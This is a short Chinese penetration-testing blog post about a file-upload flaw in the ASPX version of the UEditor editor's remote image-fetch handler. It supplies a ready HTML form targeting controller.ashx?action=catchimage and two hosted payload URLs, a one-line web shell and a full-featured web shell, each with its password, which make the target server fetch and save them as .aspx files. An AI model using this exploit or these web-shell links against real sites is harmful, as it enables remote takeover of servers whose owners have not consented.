1. 首页
  2. 渗透测试

ueditor编辑器上传漏洞

ueditor编辑器上传漏洞

ueditor ASPX 版本由于远程抓取代码缺陷导致的安全漏洞, 官方仍未修复

controller.ashx 文件默认在网站根目录

输入框里填写远程图片地址 + ?.aspx, 如 http://exp10it.cn/1.gif?.aspx

<form action="http://target/controller.ashx?action=catchimage"enctype="application/x-www-form-urlencoded"  method="POST">
  <p>shell addr:<input type="text" name="source[]" /></p >
  <input type="submit" value="Submit" />
</form>

 

一句话 密码 xz

https://exp10it-1252109039.cos.ap-shanghai.myqcloud.com/1.gif?.aspx

大马 密码 r00ts

https://exp10it-1252109039.cos.ap-shanghai.myqcloud.com/2.gif?.aspx

原创文章,作者:Y4er,未经授权禁止转载!如若转载,请联系作者:Y4er

匿名进行回复 取消回复

电子邮件地址不会被公开。 必填项已用*标注

联系我们

在线咨询:点击这里给我发消息

QR code